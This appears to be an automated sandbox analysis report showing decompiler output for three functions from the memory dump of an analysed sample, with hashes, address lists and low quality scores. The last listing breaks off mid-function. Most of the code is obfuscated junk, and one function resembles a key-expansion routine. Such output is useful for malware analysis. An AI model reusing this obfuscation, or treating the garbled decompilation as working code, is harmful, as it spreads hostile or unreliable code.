                  • Instruction Fuzzy Hash: 36026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E01161D39(signed int __eax, void* __ebx, void* __ecx, void* __edx, signed int __esi) {
                  				signed char _t22;
                  				signed int _t28;
                  				signed int _t34;
                  				signed char _t37;
                  				signed int _t40;
                  				signed int _t44;
                  				signed int _t47;
                  				void* _t48;
                  
                  				_t44 = __esi;
                  				asm("rcl dword [0x1527f3ee], 0xa3");
                  				_t22 = __eax ^ 0xa5b2e4f8 ^  *0xf7944e1;
                  				_t47 =  *0x330b8469 * 0x6477;
                  				_t28 = __ebx +  *0x19be53b8;
                  				 *0xa7bd34e4 =  *0xa7bd34e4 ^ _t22;
                  				_pop(_t37);
                  				if( *0xa7bd34e4 >= 0) {
                  					L1:
                  					asm("rol dword [0x229bb109], 0xeb");
                  					_t47 = _t47 + 1;
                  					asm("rol dword [0x124cdbfd], 0xe8");
                  					 *0xafc40dfd =  *0xafc40dfd << 0xef;
                  				} else {
                  					 *0xf2050f79 =  *0xf2050f79 ^ __edx;
                  					__esp = __esp ^ 0x15c2546c;
                  					__esi = 0x206db13d;
                  					 *0xd6333615 =  *0xd6333615 + 0x206db13d;
                  					__dl = __dl +  *0x6b34e9b7;
                  					__ebx = __ebx & 0xa3e6bf31;
                  					asm("sbb [0xf34444e3], ah");
                  					 *0x28ba962a =  *0x28ba962a >> 0xef;
                  					_pop(__ecx);
                  					_push( *0x24711be);
                  					asm("adc [0xb377dfa3], ebx");
                  					asm("rcl dword [0xe2bc6a1b], 0xc7");
                  					__ecx = __ecx -  *0x8a7f897;
                  					asm("ror byte [0x1527f3f2], 0x36");
                  					if(__bh <= 0) {
                  						goto L1;
                  					} else {
                  						__eax =  *0xcff09e7e * 0xba5b;
                  						asm("sbb al, 0xe5");
                  						__edx =  *0x1fc6b88e;
                  						asm("sbb eax, [0x59c55e07]");
                  						__ebp = __ebp ^  *0x42621be;
                  						__ecx = __ecx | 0xe8103b11;
                  						asm("sbb edx, [0x460ed737]");
                  						_push(__ebp);
                  						0x9673e403 +  *0xcff09e7e * 0xba5b = 0x9673e403 +  *0xcff09e7e * 0x0000ba5b |  *0xb58e85db;
                  						 *0xe2f250da =  *0xe2f250da >> 0xc6;
                  						 *0xcae923c1 =  *0xcae923c1 ^ __ebp;
                  						_t13 = __ebx;
                  						__ebx =  *0x2d156adf;
                  						 *0x2d156adf = _t13;
                  						__esp =  *0xe4f5b22b;
                  						 *0xeb6646e5 =  *0xeb6646e5 | __ah;
                  						__al = __al ^  *0xd932db18;
                  						__ecx = __ecx - 1;
                  						__eax =  *0x64773313;
                  						__esi =  *0xdbe53b8;
                  						 *0xdbe53b8 = 0x206db13d;
                  						_push(0x8a5668cb);
                  						__ebp = __ebp -  *0x8863fb98;
                  						 *0xd7a55d9b =  *0xd7a55d9b & __ebp;
                  						_push( *0xac558319);
                  						 *0x15da68d0 =  *0x15da68d0 >> 0xcc;
                  						 *0xb110eaca =  *0xb110eaca + __cl;
                  						asm("sbb esp, [0x604fced1]");
                  						__dh = __dh - 0xf2;
                  						_push(__ebp);
                  						asm("sbb edx, 0xcd8faaa9");
                  						 *0xd206db1 =  *0xd206db1 >> 0x7f;
                  						 *0x8058a7cd =  *0x8058a7cd << 0x1e;
                  						 *0x38d7a188 =  *0x38d7a188 >> 0xc4;
                  						_push(__ebp);
                  						__ebx =  *0xd75d53b8;
                  						 *0xd75d53b8 =  *0x2d156adf;
                  						__ebp = __ebp ^  *0x7ae81f19;
                  						asm("sbb edi, [0x7937c5b8]");
                  						 *0x41d1e5dd =  *0x41d1e5dd << 0x1e;
                  						asm("rcr byte [0x6aecd882], 0xee");
                  						_push( *0xd75d53b8);
                  						 *0xc2546c8a =  *0xc2546c8a ^ __cl;
                  						__esi = 0x6db13d15;
                  						__ch = __ch ^ 0x00000008;
                  						if(__al < 0) {
                  							goto L1;
                  							do {
                  								do {
                  									do {
                  										do {
                  											goto L1;
                  										} while ( *0xafc40dfd == 0);
                  										 *0xebc88197 = 0xefaf7a74;
                  										_t34 =  *0x47681ae5;
                  										asm("sbb [0x9bf9180a], cl");
                  										 *0x6e000829 =  *0x6e000829 & _t34;
                  										_pop(_t48);
                  										 *0xbcdb0205 =  *0xbcdb0205 << 0x54;
                  										 *0x100d41d9 =  *0x100d41d9 << 0xb7;
                  										_t22 = _t22 -  *0xcd788b2 ^  *0xa928b4de;
                  										 *0x5059fccb =  *0x5059fccb >> 0xd2;
                  										asm("scasb");
                  										_t28 = _t28 - 0x00000001 & 0x3f13d796;
                  										asm("rcr dword [0x58b262f7], 0xab");
                  										asm("lodsb");
                  										_t47 = _t48 +  *0x852a61ed;
                  										_t37 = _t37 | 0x000000d2;
                  										_pop( *0x21924e3e);
                  										asm("adc cl, 0x10");
                  										asm("rcl dword [0x4c35eeef], 0x3b");
                  										 *0x77cee58d =  *0x77cee58d - _t40;
                  										asm("ror dword [0x4461cb8e], 0x22");
                  										asm("rcl byte [0xa98d480], 0xfc");
                  										asm("rcr dword [0xc8d3bfd3], 0xf7");
                  										 *0xb4c42b4 =  *0xb4c42b4 << 0x22;
                  										_t44 = _t44 - 0x00000001 & 0xab098af3;
                  									} while (_t44 > 0);
                  									_t40 =  *0x8a97937f * 0x8912;
                  								} while (_t40 >= 0);
                  								 *0xe605fd79 =  *0xe605fd79 << 0x69;
                  								asm("rcl byte [0xf0bcc80a], 0x6d");
                  								_t22 = _t22 &  *0x4821fe6f;
                  								_t37 =  *0x240a8aa2;
                  								_t28 =  *0xb30f8f01;
                  								_t40 =  *0xa3462f0d;
                  								asm("adc cl, 0x8a");
                  								asm("rol dword [0xeca4e60f], 0x9f");
                  								 *0xaf93041a =  *0xaf93041a & _t22;
                  								asm("adc edi, [0x39b85af3]");
                  								asm("ror byte [0xe16eb810], 0x27");
                  								 *0xf0083212 =  *0xf0083212 << 0x70;
                  								_t44 = _t44 + 1 - 1;
                  								L1();
                  								 *0xb72b1fe8 =  *0xb72b1fe8 | _t40;
                  							} while ( *0xb72b1fe8 <= 0);
                  							asm("adc esi, [0x4eddc476]");
                  							 *0xd02b2388 =  *0xd02b2388 << 0x13;
                  							_push( *0xfc3d6009);
                  							asm("adc edi, 0x8598a113");
                  							 *0x71ad01e2 =  *0x71ad01e2 << 0x52;
                  							asm("sbb [0xfd967721], ecx");
                  							 *0xf6c0a2c7 =  *0xf6c0a2c7 + _t28;
                  							asm("adc dl, 0xe3");
                  							 *0x9454ca64 =  *0x9454ca64 | _t44;
                  							L1();
                  							 *0x942d2ce8 =  *0x942d2ce8 >> 0xd2;
                  							asm("adc eax, [0xc90c34bd]");
                  							asm("sbb edi, 0x5bfc46c2");
                  							_push( *0x41029527);
                  							asm("sbb edi, 0xfb350d8e");
                  							 *0x4df446fe =  *0x4df446fe & _t44;
                  							 *0xa9465ee0 =  *0xa9465ee0 - _t37;
                  							_push(_t34 - 0x3414c9b);
                  							asm("adc ah, [0x9931c2a8]");
                  							_push(_t47 ^  *0xf415b894);
                  							asm("rcl byte [0xa50173ca], 0xfb");
                  							return  *0x6af824de & 0xa892a2c0 |  *0xf1aba502;
                  						} else {
                  							 *0xafaca078 =  *0xafaca078 & __ebp;
                  							_pop(__ebx);
                  							__eax = __eax |  *0xbe53b864;
                  							_t18 = __ecx;
                  							__ecx =  *0x3f587f21;
                  							 *0x3f587f21 = _t18;
                  							__ebx = __ebx + 1;
                  							__esp =  *0x1e239060 * 0xa524;
                  							return __eax;
                  						}
                  					}
                  				}
                  			}











                  0x01161d39
                  0x01161d44
                  0x01161d51
                  0x01161d5d
                  0x01161d67
                  0x01161d73
                  0x01161d79
                  0x01161d7a
                  0x0116118d
                  0x0116118d
                  0x01161194
                  0x01161195
                  0x0116119c
                  0x01161d80
                  0x01161d80
                  0x01161d8c
                  0x01161d92
                  0x01161d98
                  0x01161d9e
                  0x01161da4
                  0x01161daa
                  0x01161db0
                  0x01161db7
                  0x01161db8
                  0x01161dbe
                  0x01161dc4
                  0x01161dcb
                  0x01161dd1
                  0x01161dde
                  0x00000000
                  0x01161de4
                  0x01161de4
                  0x01161dee
                  0x01161df0
                  0x01161df7
                  0x01161dfd
                  0x01161e03
                  0x01161e09
                  0x01161e0f
                  0x01161e15
                  0x01161e21
                  0x01161e28
                  0x01161e2e
                  0x01161e2e
                  0x01161e2e
                  0x01161e34
                  0x01161e3a
                  0x01161e40
                  0x01161e46
                  0x01161e47
                  0x01161e4c
                  0x01161e4c
                  0x01161e58
                  0x01161e59
                  0x01161e5f
                  0x01161e65
                  0x01161e6b
                  0x01161e75
                  0x01161e7b
                  0x01161e81
                  0x01161e84
                  0x01161e85
                  0x01161e8b
                  0x01161e92
                  0x01161e99
                  0x01161ea0
                  0x01161ea1
                  0x01161ea1
                  0x01161ea7
                  0x01161ead
                  0x01161eb3
                  0x01161eba
                  0x01161ec1
                  0x01161ec2
                  0x01161ec8
                  0x01161ed3
                  0x01161edd
                  0x00000000
                  0x0116118d
                  0x0116118d
                  0x0116118d
                  0x0116118d
                  0x00000000
                  0x00000000
                  0x011611b6
                  0x011611bc
                  0x011611c2
                  0x011611ce
                  0x011611d4
                  0x011611d5
                  0x011611dc
                  0x011611e3
                  0x011611e9
                  0x011611f0
                  0x011611f2
                  0x011611f8
                  0x011611ff
                  0x01161200
                  0x0116120c
                  0x0116120f
                  0x01161215
                  0x01161218
                  0x01161220
                  0x01161226
                  0x0116122d
                  0x01161234
                  0x0116123b
                  0x01161242
                  0x01161242
                  0x0116124e
                  0x0116124e
                  0x0116125e
                  0x0116126b
                  0x01161272
                  0x01161279
                  0x0116127f
                  0x01161285
                  0x0116128b
                  0x0116128e
                  0x01161295
                  0x0116129b
                  0x011612a1
                  0x011612a8
                  0x011612af
                  0x011612b0
                  0x011612b5
                  0x011612b5
                  0x011612c1
                  0x011612cc
                  0x011612d9
                  0x011612eb
                  0x011612f7
                  0x011612fe
                  0x01161304
                  0x0116131d
                  0x0116132b
                  0x01161334
                  0x01161339
                  0x01161342
                  0x0116134b
                  0x01161351
                  0x0116135d
                  0x01161363
                  0x01161369
                  0x01161375
                  0x01161376
                  0x01161382
                  0x01161389
                  0x01161396
                  0x01161ee3
                  0x01161ee3
                  0x01161ee9
                  0x01161ef0
                  0x01161ef6
                  0x01161ef6
                  0x01161ef6
                  0x01161efc
                  0x01161f03
                  0x01161f0d
                  0x01161f0d
                  0x01161edd
                  0x01161dde

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a223b0828a6c5d96318e2a6225e6fdca3fcdc5435f2df56dd78a9df59862a16
                  • Instruction ID: 76a49e33ade7a9b5138e34287fa85fb3e74c7fd2d53550b1d9a203cb803e84a2
                  • Opcode Fuzzy Hash: 9a223b0828a6c5d96318e2a6225e6fdca3fcdc5435f2df56dd78a9df59862a16
                  • Instruction Fuzzy Hash: 11914032518795DBDB16CF38D88AB423FB6F742720B48438EC4B2865E2D779252ACB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 35%
                  			E011444C0(void* __ecx, void* __eflags, signed int _a4, signed int _a12, signed int _a16, intOrPtr _a20) {
                  				char _v256;
                  				char _v272;
                  				signed int __ebx;
                  				signed int __edi;
                  				void* __ebp;
                  				signed int _t75;
                  				intOrPtr _t77;
                  				intOrPtr* _t78;
                  				signed char _t84;
                  				void* _t91;
                  				void* _t95;
                  
                  				_pop(_t91);
                  				asm("les edi, [edi]");
                  				if(__eflags != 0) {
                  					_t77 =  *((intOrPtr*)(_t75 % _t84 - 0x73))();
                  					_t6 = _t95 + _t77;
                  					_t78 =  *_t6;
                  					 *_t6 = _t77;
                  					 *_t78 =  *_t78 + _t78;
                  					_push(_t78);
                  					E0115FA77();
                  					_t9 = _t91 + 0x804; // 0x804
                  					E0115FA77(_t9,  &_v256, 0x100);
                  					_t11 = _t91 + 0x904; // 0x904
                  					E0115FA77(_t11,  &_v272, 0xc);
                  					return _t91;
                  				} else {
                  					 *__ecx =  *__ecx & 0x00000055;
                  					__eflags =  *__ecx;
                  					__ebp = __esp;
                  					__ecx = _a16;
                  					__eax =  *__ecx;
                  					__edx = _a12;
                  					_push(__ebx);
                  					_push(__esi);
                  					_push(__edi);
                  					__esi = __eax;
                  					asm("ror esi, 0x8");
                  					__esi = __eax & 0xff00ff00;
                  					asm("rol eax, 0x8");
                  					 *__edx = __esi;
                  					__esi =  *(__ecx + 4);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 4) = __edi;
                  					__esi =  *(__ecx + 8);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 8) = __edi;
                  					__esi =  *(__ecx + 0xc);
                  					__eax = __edx + 4;
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0xc) = __edi;
                  					__esi =  *(__ecx + 0x10);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x10) = __edi;
                  					__esi =  *(__ecx + 0x14);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x14) = __edi;
                  					__esi =  *(__ecx + 0x18);
                  					__edi = __esi;
                  					asm("ror edi, 0x8");
                  					__edi = __esi & 0xff00ff00;
                  					asm("rol esi, 0x8");
                  					 *(__edx + 0x18) = __edi;
                  					__ecx =  *(__ecx + 0x1c);
                  					__esi = __ecx;
                  					asm("ror esi, 0x8");
                  					__esi = __ecx & 0xff00ff00;
                  					asm("rol ecx, 0x8");
                  					__esi = __esi | __ecx;
                  					__eflags = _a20 - 0x100;
                  					 *(__edx + 0x1c) = __esi;
                  					if(_a20 != 0x100) {
                  						L7:
                  						_pop(__edi);
                  						_pop(__esi);
                  						__eax = __eax | 0xffffffff;
                  						__eflags = __eax;
                  						_pop(__ebx);
                  						return __eax;
                  					} else {
                  						__esi = _a4;
                  						__ebx = 0;
                  						__eflags = 0;
                  						_a12 = 0;
                  						while(1) {
                  							__edi =  *(__eax + 0x18);
                  							 *(__esi + __ebx + 0x904) & 0x000000ff = ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x10;
                  							__edi = __edi >> 0x10;
                  							__edi >> 0x00000010 & 0x000000ff =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4);
                  							 *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010;
                  							__edi = __edi >> 8;
                  							__edi >> 0x00000008 & 0x000000ff =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4);
                  							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
                  							( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 8 = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
                  							__edi = __edi >> 0x18;
                  							__edi >> 0x00000018 & 0x000000ff =  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
                  							__edi = __edi & 0x000000ff;
                  							 *(__esi + 4 + (__edi & 0x000000ff) * 4) =  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
                  							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00 ^  *(__eax - 4);
                  							__edx =  *__eax;
                  							__edx =  *__eax ^ __ecx;
                  							 *(__eax + 0x1c) = __ecx;
                  							__ecx =  *(__eax + 4);
                  							__ecx =  *(__eax + 4) ^ __edx;
                  							 *(__eax + 0x20) = __edx;
                  							__edx =  *(__eax + 8);
                  							__edx =  *(__eax + 8) ^ __ecx;
                  							 *(__eax + 0x24) = __ecx;
                  							 *(__eax + 0x28) = __edx;
                  							__eflags = __ebx - 6;
                  							if(__ebx == 6) {
                  								break;
                  							}
                  							__edx = __edx >> 0x18;
                  							__edx >> 0x00000018 & 0x000000ff =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4);
                  							__edx = __edx >> 0x10;
                  							__edx >> 0x00000010 & 0x000000ff =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4);
                  							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000;
                  							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
                  							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 8;
                  							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
                  							__edx = __edx >> 8;
                  							__ebx = __edx >> 0x00000008 & 0x000000ff;
                  							__ebx =  *(__esi + 4 + (__edx >> 0x00000008 & 0x000000ff) * 4);
                  							__edx = __edx & 0x000000ff;
                  							__edx =  *(__esi + 5 + __edx * 4) & 0x000000ff;
                  							__ecx = __ecx ^ __ebx;
                  							__ebx = _a12;
                  							__ecx = __ecx ^ __edx;
                  							__ecx = __ecx ^  *(__eax + 0xc);
                  							__edx =  *(__eax + 0x10);
                  							__edx =  *(__eax + 0x10) ^ __ecx;
                  							 *(__eax + 0x2c) = __ecx;
                  							__ecx =  *(__eax + 0x14);
                  							__ecx =  *(__eax + 0x14) ^ __edx;
                  							 *(__eax + 0x34) = __ecx;
                  							__ecx = __ecx ^ __edi;
                  							__ebx = _a12 + 1;
                  							 *(__eax + 0x30) = __edx;
                  							 *(__eax + 0x38) = __ecx;
                  							__eax = __eax + 0x20;
                  							_a12 = __ebx;
                  							__eflags = __ebx - 7;
                  							if(__ebx < 7) {
                  								continue;
                  							} else {
                  								goto L7;
                  							}
                  							goto L9;
                  						}
                  						_pop(__edi);
                  						_pop(__esi);
                  						__eax = 0xe;
                  						_pop(__ebx);
                  						return 0xe;
                  					}
                  				}
                  				L9:
                  			}














                  0x011444c0
                  0x011444c1
                  0x011444c3
                  0x01144478
                  0x0114447b
                  0x0114447b
                  0x0114447b
                  0x0114447e
                  0x01144480
                  0x01144481
                  0x01144492
                  0x01144499
                  0x011444a7
                  0x011444ae
                  0x011444bd
                  0x011444c5
                  0x011444c5
                  0x011444c5
                  0x011444c8
                  0x011444ca
                  0x011444cd
                  0x011444cf
                  0x011444d2
                  0x011444d3
                  0x011444d4
                  0x011444d5
                  0x011444d7
                  0x011444da
                  0x011444e0
                  0x011444ea
                  0x011444ec
                  0x011444ef
                  0x011444f1
                  0x011444f4
                  0x011444fa
                  0x01144505
                  0x01144508
                  0x0114450b
                  0x0114450d
                  0x01144510
                  0x01144516
                  0x01144521
                  0x01144524
                  0x01144527
                  0x0114452a
                  0x0114452c
                  0x0114452f
                  0x01144535
                  0x01144540
                  0x01144543
                  0x01144546
                  0x01144548
                  0x0114454b
                  0x01144551
                  0x0114455c
                  0x0114455f
                  0x01144562
                  0x01144564
                  0x01144567
                  0x0114456d
                  0x01144578
                  0x0114457b
                  0x0114457e
                  0x01144580
                  0x01144583
                  0x01144589
                  0x01144594
                  0x01144597
                  0x0114459a
                  0x0114459c
                  0x0114459f
                  0x011445a5
                  0x011445ae
                  0x011445b0
                  0x011445b7
                  0x011445ba
                  0x011446d4
                  0x011446d4
                  0x011446d5
                  0x011446d6
                  0x011446d6
                  0x011446d9
                  0x011446db
                  0x011445c0
                  0x011445c0
                  0x011445c3
                  0x011445c3
                  0x011445c5
                  0x011445c8
                  0x011445c8
                  0x011445d3
                  0x011445d8
                  0x011445e1
                  0x011445eb
                  0x011445ef
                  0x011445f8
                  0x011445fc
                  0x01144605
                  0x01144609
                  0x01144612
                  0x01144617
                  0x0114461b
                  0x01144625
                  0x0114462b
                  0x0114462d
                  0x01144630
                  0x01144632
                  0x01144634
                  0x01144637
                  0x0114463a
                  0x0114463c
                  0x0114463f
                  0x01144642
                  0x01144644
                  0x01144647
                  0x0114464a
                  0x0114464d
                  0x00000000
                  0x00000000
                  0x01144655
                  0x0114465e
                  0x01144664
                  0x0114466d
                  0x01144671
                  0x01144677
                  0x0114467d
                  0x01144680
                  0x01144684
                  0x01144687
                  0x0114468d
                  0x01144691
                  0x01144697
                  0x011446a2
                  0x011446a4
                  0x011446a7
                  0x011446a9
                  0x011446ac
                  0x011446af
                  0x011446b1
                  0x011446b4
                  0x011446b7
                  0x011446b9
                  0x011446bc
                  0x011446be
                  0x011446bf
                  0x011446c2
                  0x011446c5
                  0x011446c8
                  0x011446cb
                  0x011446ce
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x011446ce
                  0x011446dc
                  0x011446dd
                  0x011446de
                  0x011446e3
                  0x011446e5
                  0x011446e5
                  0x011445ba
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bdf3ae78eb16012a1617dc754252206166292fc1b40f6e617d08486b588c09e
                  • Instruction ID: 367273778a008fcf4df03eb601205430dfcaba2c32afd5d02841f742991d827f
                  • Opcode Fuzzy Hash: 0bdf3ae78eb16012a1617dc754252206166292fc1b40f6e617d08486b588c09e
                  • Instruction Fuzzy Hash: D261C4B3E146214BD318CF19CC40672B792EFD8312B5B81BEDD1A8B257CA74A9529B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E0116236A(signed int __eax, signed int __ebx, signed char __ecx, signed int __edx, signed int __esi) {
                  				char _v3;
                  				char _v5;
                  				void* _v492138382;
                  				signed int _t26;
                  				signed int _t29;
                  				signed char _t31;
                  				signed char _t32;
                  				signed int _t34;
                  				signed char _t39;
                  				signed char _t46;
                  				signed int _t48;
                  				signed int _t52;
                  				signed int _t58;
                  				signed int _t60;
                  				signed int _t61;
                  				signed int _t69;
                  				signed int _t70;
                  				signed int _t72;
                  				signed int _t76;
                  
                  				_t61 = __esi;
                  				_t48 = __edx;
                  				_t39 = __ecx;
                  				_t34 = __ebx;
                  				_t26 = __eax;
                  				goto L1;
                  				do {
                  					do {
                  						do {
                  							do {
                  								do {
                  									L1:
                  									_t34 = _t34 + 0xb7;
                  									 *0xb0939ff7 =  *0xb0939ff7 >> 0x8c;
                  									asm("rol dword [0xe217dc62], 0x44");
                  									_t26 = _t26 -  *0x748f83e7 |  *0xc4bbc419;
                  									 *0x759084e5 =  *0x759084e5 & _t34;
                  									_t61 = _t61 - 1;
                  									_t48 = _t48 ^ 0x00000063;
                  									_push(0xb00218dd);
                  									asm("scasb");
                  								} while (_t48 >= 0);
                  								asm("lodsb");
                  								 *0xc1ddbd1c =  *0xc1ddbd1c & _t34;
                  								 *0xefa8e0cc =  &_v5;
                  								 *0x85c02c16 =  *0x85c02c16 - _t48;
                  								 *0xb2efca25 =  *0xb2efca25 ^  *0xefa8e0cc;
                  								asm("adc ah, [0xa8e0cc32]");
                  								_t61 = 0xef4544a1 |  *0xc6a616ef;
                  								_t69 =  &_v3;
                  								asm("adc ebp, [0xc1daa919]");
                  								_t39 = _t39 - 0x32 + 0x32;
                  								 *0xefa8e0cc =  *0xefa8e0cc ^ _t69;
                  								_t70 = _t69 & 0x75c83916;
                  							} while (_t70 > 0);
                  							_pop( *0xa8009977);
                  							 *0x45d8a8c4 =  *0x45d8a8c4 | _t70;
                  							 *0x173a7bc8 =  *0x173a7bc8 << 0x91;
                  							_push(_t48 -  *0xc68ff209);
                  							_t29 = _t26 +  *0x3816efa8 + 1;
                  							_push(_t29);
                  							 *0xef45d88d =  *0xef45d88d << 0xa5;
                  							asm("adc cl, 0x3a");
                  							asm("sbb ebx, 0xef45d88d");
                  							_push(_t29 &  *0x81d04116);
                  							_push( *0xef45d88d);
                  							_pop(_t31);
                  							 *0xaddd0fb4 = _t34;
                  							asm("sbb ebx, 0x87dbae16");
                  							_t52 =  *0x32ee16ef;
                  							 *0x1db40ffd =  *0x1db40ffd >> 0x38;
                  							_t76 = 0xef45d88d |  *0xe0cc3283;
                  							_push( *0xbe0b1c6d);
                  							 *0xcc32c1ef =  *0xcc32c1ef - 0xe0cc32c1;
                  							asm("ror byte [0x8a16efa8], 0x2f");
                  							_t34 =  *0xaddd0fb4 + 0xbe17ff2f;
                  							_t61 =  *0xcc32bfdd;
                  							 *0x16efa8e0 =  *0x16efa8e0 << 0xbd;
                  							_t26 = _t31 &  *0x32c5f7c6;
                  							 *0xefa8e0cc =  *0xefa8e0cc | _t52;
                  							 *0xfa34f216 =  *0xfa34f216 - _t61;
                  							_t48 = _t52 -  *0xb9d9b004;
                  							 *0xa8e0cc32 =  *0xa8e0cc32 - _t26;
                  							 *0xc62116ef =  *0xc62116ef + _t61;
                  							 *0x1ee67b3 =  *0x1ee67b3 - _t48;
                  							_t39 = _t39 - 1;
                  							 *0xa2f716d2 =  *0xa2f716d2 << 0xc1;
                  						} while ( *0xa2f716d2 <= 0);
                  						_t76 =  *0x395f828e;
                  						asm("sbb [0x36b616d2], cl");
                  						asm("rol dword [0xe0cc32cc], 0x19");
                  						asm("adc bl, [0xa816efa8]");
                  						 *0x9d8d8ce2 =  *0x9d8d8ce2 + _t34;
                  						 *0xcc32aece =  *0xcc32aece >> 0x51;
                  						asm("sbb ch, 0xe0");
                  						 *0x8e16efa8 =  *0x8e16efa8 << 0x4d;
                  						_t72 =  &_v492138382 ^  *0x9c01269e;
                  						 *0xcc32c1d7 =  *0xcc32c1d7 << 0xc0;
                  						_t26 = _t26 +  *0x16efa8e0;
                  						 *0x869af2ba = _t34;
                  						asm("scasd");
                  						asm("sbb [0x395fc3cc], ebp");
                  						asm("adc esi, [0xf5bda798]");
                  						asm("sbb [0x395fbed3], ebp");
                  						_t39 =  *0xf2c1ab9c - 1;
                  						asm("adc dh, 0xd2");
                  						 *0x1c621c16 =  *0x1c621c16 << 0xbe;
                  						 *0xc1dba407 =  *0xc1dba407 & _t48;
                  						 *0xa8e0cc32 =  *0xa8e0cc32 >> 0x4f;
                  						_t48 = _t48 ^  *0xa2fe16ef;
                  					} while (_t48 >= 0);
                  					asm("sbb al, 0xa8");
                  					 *0xd1b49ba0 =  *0xd1b49ba0 & _t39;
                  					_t26 = _t26 | 0x395fa899;
                  					_t46 = _t39 - 1;
                  					 *0xe0cc32c1 =  *0xe0cc32c1 - _t72;
                  					asm("adc al, 0xa8");
                  					 *0xccecc9b4 =  *0xccecc9b4 & 0x470c16ef;
                  					_t48 = ((0x470c16ef |  *0xc48616d2) ^  *0xe0cc32c1) + 0xa8;
                  					 *0xb70016ef =  *0xb70016ef + (_t61 |  *0x49395fc2);
                  					asm("adc bl, 0x88");
                  					asm("scasd");
                  					_pop(_t58);
                  					asm("rcr dword [0x16d24939], 0xf4");
                  					_t34 = (_t34 |  *0x45d8a8c4) + 0xf4be16ef - 0xa0 + 0xb4;
                  					asm("rol dword [0x8daddd0f], 0xf1");
